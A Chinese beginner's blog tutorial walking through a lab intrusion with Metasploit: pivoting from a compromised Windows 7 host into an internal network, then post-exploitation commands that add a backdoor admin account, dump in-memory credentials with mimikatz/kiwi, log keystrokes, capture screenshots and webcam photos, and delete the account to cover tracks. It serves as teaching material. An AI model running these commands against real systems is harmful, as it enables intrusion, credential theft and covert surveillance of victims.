网络安全入门学习第三课

已于 2023-07-01 23:15:35 修改
阅读量1.3k 收藏 10
点赞数 2
分类专栏: web安全 文章标签: web安全 学习
于 2023-05-05 16:09:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p36273/article/details/130507804
版权

网络安全入门学习第三课

一、正向连接和反向连接

  • 正向连接
    1.它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信
    2.常见的是bind_tcp
    3.特点:不出网,会面临防火墙的挑战

  • 反向连接
    1.它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口
    2.常见的是reverse_tcp
    3.特点:出网,把目标勾出来,不用面临防火墙

二、跨网段攻击复现

1.环境

  • 攻击者:Kali Linux(68.120.110.128)
  • 靶机:Windows 7(68.120.110.131,10.10.10.129)、Windows XP(10.10.10.131)

2.使用漏洞

  • ms17-010(永恒之蓝)、ms08-067

3.工具

  • Nmap 网络扫描工具
  • Metasploit 渗透框架

4.开始复现

  • 通过ms17-010漏洞获取靶机的shell权限

在这里插入图片描述

  • 查看网卡,发现该电脑存在内网IP:10.10.10.129

在这里插入图片描述
小知识:出现乱码可以输入:chcp 65001
在这里插入图片描述

  • 查看arp映射表,发现内网同网段的另一台设备IP:10.10.10.131
   arp -a

在这里插入图片描述

  • 返回meterpreter终端将内网网段10.10.10.0/24添加至路由表,使用 autoroute 脚本
	exit
	run autoroute -s 10.10.10.0/24

在这里插入图片描述
在这里插入图片描述

  • 查看路由表映射情况
	run autoroute -p

在这里插入图片描述
这时kali就与内网建立了联系,可以直接访问内网

  • 尝试对10.10.10.131的设备进行扫描,发现该设备是一台Windows XP设备并且打开了445端口
	nmap -sS -O 10.10.10.131

在这里插入图片描述

  • 退出会话到后台
	background

在这里插入图片描述

  • 这里知道了内网主机是windows XP ,这里可以使用ms08-067进行攻击

在这里插入图片描述
注意:这里payload只能使用正向连接

	set payload windows/meterpreter/bind_tcp

在这里插入图片描述

  • 开始攻击

在这里插入图片描述

这里攻击失败了

后咨询其他人,告知要么用英文版的 xp ,要么就改用2019版的kali系统

三、部分后渗透攻击

后渗透攻击都是基于攻击完成,能获取到目标系统权限,这里的示例都基于上面跨网段攻击的环境、工具和漏洞

(一)Metasploit之创建账号、加入管理员组,并通过远程桌面进行连接

  • rdesktop连接windows主机条件:
    1. 在待连接的Windows主机上依次右击“我的电脑”->”属性”->“高级系统设置”->”远程设置”->在远程桌面选项中,选择允许运行任意版本远程桌面的连接;
    2. 检查linux主机和待连接的Windows 主机是否可以相互ping通;
    3. 检查rdesktop 后面追加的ip地址是否正确;
    4. 在Windows主机给用户创建密码,有时候rdesktop无法支持无密码的远程连接;
    5. 关闭Windows主机的防火墙。

攻击成功

  • 创建用户,用户名:hack,密码:123456
	run getgui -u hack -p 123456

在这里插入图片描述

  • 进入shell后台

在这里插入图片描述

  • 查看当前用户权限(此时只有最低的user权限)
	net user hack

在这里插入图片描述

  • 将hack用户添加到管理员用户组
	net localgroup administrators hack /add

在这里插入图片描述

  • 再次查看当前用户权限(这时有管理员权限)

在这里插入图片描述

  • 查看系统用户
	net user

在这里插入图片描述

  • 查看管理员组的用户
	net localgroup administrators

在这里插入图片描述

在对应的Windows 7系统也能看到该用户

在这里插入图片描述

  • 在kali中远程连接
	rdesktop 68.120.110.131

在这里插入图片描述
在这里插入图片描述

  • 清楚痕迹删除当前创建的用户
	net user hack /del

在这里插入图片描述

(二)Metasploit之抓取保存在内存的密码

攻击成功

  • 把用户权限提升至system(最高)级别
	getsystem

在这里插入图片描述

  • 加载kiwi模块,旧版本叫mimikatz
	load mimikatz 或者 load kiwi

在这里插入图片描述

  • 获取密码
	creds_all

在这里插入图片描述

(三)Metasploit之桌面截屏、键盘监听、利用摄像头拍照

攻击成功

1.桌面截屏

	screenshot

在这里插入图片描述
在这里插入图片描述

2.键盘监听

  • 提权,获取系统的运行账户,执行getuid;获取系统权限,执行getsystem

在这里插入图片描述

  • 查看目标主机上的进程
	ps

在这里插入图片描述

  • 找到explorer进程

在这里插入图片描述

  • 输入explorer进程对应的PID值,这里是2080
	migrate 2080

在这里插入图片描述

  • 稳一手,再次提权

在这里插入图片描述

  • 开始键盘监听
	keyscan_start

在这里插入图片描述

  • 在靶机上随机输入文本信息

在这里插入图片描述

  • 查看目标主机上键盘输入的信息
	keyscan_dump

在这里插入图片描述

  • 结束键盘监听
	keyscan_stop

在这里插入图片描述

3.利用摄像头拍照

	webcam_snap

在这里插入图片描述

p36273
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
http反向连接技术
与狼共舞 的专栏
11-10 6120
常见的普通木马,是安装在用户计算机里的一段服务程序,而攻击者控制的则是相应的客户端程序.服务程序通过特定的端口,打开用户计算机的连接资源.一旦攻击者所掌握的客户端程序发出请求,木马便和他连接起来,将用户的信息窃取出去.这种连接方法叫做主动连接,这类木马的一般工作模式如图1所示.可见,此类木马的最大弱点,在于攻击者必须和用户主机建立连接,木马才能起作用.一般的防火墙都限制外部对内的连接,因此这样的木马很难工作起来.而反弹式木马_4 J,在工作原理上就与常见的木马不一样.图2是反弹式木马的一般工作原理.木马程序
内网渗透体系学习5
m0_55772907的博客
10-26 2040
内网
反弹shell的正向连接反向连接
最新发布
m0_61361405的博客
03-16 456
通常指受害主机(被控制端)监听一个端口,由控制主机(攻击端)主动去连接受害主机的过程。
SSH正向连接反向连接
icylling的专栏
04-27 6271
ssh -L sourcePort:forwardToHost:onPort connectToHost 意思:连接主机connectToHost,监听本地的端口sorcePort,通过主机connectToHost,把到本地端口sorcePort的连接转发到主机forwardToHost的端口onPort。 图中的两个例子: your host是敲命令的主机。 ssh -L 123:local...
计算机网络安全基础(第三版)习题讲解.pdf
11-29
计算机网络安全基础(第三版)习题讲解.pdf
网络安全基础 标准与应用第六版
09-13
简明扼要介绍计算机网络安全知识,最新英文原版pdf
网络设备安全配置第一次课
01-02
10. **策略和审计**:制定明确的网络安全政策,并定期进行安全审计,确保所有配置符合最佳实践。 在张老师的课程中,通过0919.pkt、作业1.pkt、作业2.pkt、作业.pkt、实验.pkt等文件,学生可以进行实践操作,加深对...
第3课网络安全基础编程PowerPointPres.pptx
10-06
网络安全基础编程】\n\n网络安全编程是保护网络系统免受恶意攻击的关键领域,它涉及编写安全的代码,以确保数据的完整性和用户的隐私。本课程主要关注Windows平台下的网络安全编程基础。\n\n在Windows操作系统中,...
第3课-网络安全基础编程-PowerPointPres.pptx
10-07
在本课程的第三课中,主要讲解了Windows操作系统的基础和C语言在网络编程中的应用。 首先,理解Windows的内部机制至关重要。Windows是一个基于事件、消息驱动的操作系统,用户操作触发的事件会转化为系统发送给应用...
ssh正向连接反向连接 用大白话解释
weixin_45208900的博客
08-30 1324
这篇文章说的不严谨的 我一开始学这个东西很迷惑 总感觉不清晰 就查了很多东西 最后想总结成通俗易懂的笔记记录下来 也会希望和我一样的小白读了后能懂 如果dalao觉得我有地方说错了 请私信我 我会立刻改的 1、ssh 正向连接 客户端连服务端 然后客户端能看到(访问)服务端能看见的东西 2、ssh 反向连接 客户端连服务端 然后客户端把能看见(访问)的东西 给服务端看 如果有三台计算机 A B C A的ip是 192.168.0.1 B 有俩 ip 192.168.0.2和10.10.10.1 .
TCP客户端(飞机机载设备)连接nginx反向代理访问TCP服务端
Gblfy_Blog
08-04 1342
TCP客户端连接nginx反向代理访问TCP服务端
TCP反向代理介绍
輚至消亡
05-01 6536
1 TCP Proxy目前,设备仅支持通过Web方式配置TCP Proxy。 1.1  概述1.1.1  SYN Flood攻击简介一般情况下,TCP连接的建立需要经过三次握手,即:(1)      TCP连接请求的发起者向目标服务器发送SYN报文;(2)      目标服务器收到SYN报文后,建立处于SYN_RECEIVED状态的TCP半连接,并向发起者回复SYN ACK报文,等待发起者的回应;...
c#做端口转发程序支持正向连接反向链接
热门推荐
laotse的专栏
09-10 1万+
3389的时候 例子1:连接a机器的3389端口连不上,因为对方防火墙或者网关做了限制,只能访问a机器的个别端口比如80。 例子2:连接a机器的几乎所有端口都连不上(对方乃内网或者防火墙网关做了限制),只能1433上去,但是对方可以连接你的某些端口。   解决 第一种较简单,只需要程序在对方开80,你连接他80,程序收到数据后,发送到他本机的3389,同时从他3389收到数据后返回到你。
ssh正向连接反向连接、做socks代理
su_ocean16的专栏
11-27 2273
最近才发现ssh有多么的强大! 在网上搜了半天,发现大多数人都是一瓶子不满的水平,浅尝辄止。就没有几个人有点儿科学研究的精神吗?为啥不把它搞明白呢? 当然,相信有不少人是很明白的,但是不愿意写博文来公开。其实这样大可不必,独乐乐不如众乐乐,何必那么小肚鸡肠? 1、用ssh做正向连接 啥叫正向连接?就是client连上server,然后把server能访问的机器地址和端口(当然也包括
ms17-010漏洞复现(正向连接+反向连接
qq_53733257的博客
07-15 902
攻击机和目标机一定要能互相通信,否则就要调试设置网络适配器以及查看目标机防火墙是否关闭,直到能够互相通信为止。,完成后不要关闭终端,让他一直挂在后台。set rhosts 192.168.21.19 #设置模块3的参数,将rhosts设置成目标机ip。set rhosts 192.168.21.19 #设置模块0的参数,将rhosts设置成目标机ip。4、使用编号为3的模块,对目标机进行扫描,确认该目标机是否存在ms17-010漏洞。5、利用模块0,对目标机进行攻击,模块0的利用方式步骤和模块3相同。
Python攻防-Socket通信建立TCP反向连接
道阻且长,行则将至。
08-17 1961
文章目录前言远程控制脚本编写效果演示脚本优化getopt ()完整代码效果演示 前言 本文将记录学习基于 Socket 通信机制建立 TCP 反向连接,借助 Python 脚本实现主机远程控制的目的。 我们在传输数据时,可以只使用(传输层)TCP/IP 协议,但是那样的话,如果没有应用层,便无法识别数据内容,如果想要使传输的数据有意义,则必须使用到应用层协议,应用层协议有很多,比如 HTTP、FTP、TELNET 等,也可以自己定义应用层协议。而 Socket 是对 TCP/IP 协议的封装,Socket
网络安全新手入门学习资料
05-14
以下是网络安全新手入门学习资料的建议: 1. 网络安全基础知识:《网络安全概论》(第二版)(www.ituring.com.cn/book/1749) 2. 网络安全攻防技术:《白帽子讲Web安全》(www.ituring.com.cn/book/946) 3. 网络安全工具使用:Kali Linux(www.kali.org) 4. 网络安全漏洞挖掘:《Web安全深度剖析》(www.ituring.com.cn/book/1206) 5. 网络安全实战:CTF(Capture The Flag)比赛(https://ctftime.org/) 6. 网络安全新闻:安全客(www.anquanke.com) 7. 网络安全博客:FreeBuf(www.freebuf.com) 8. 网络安全课程:MOOC(www.icourse163.org)和Coursera(www.coursera.org) 以上资源是网络安全入门的良好起点。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值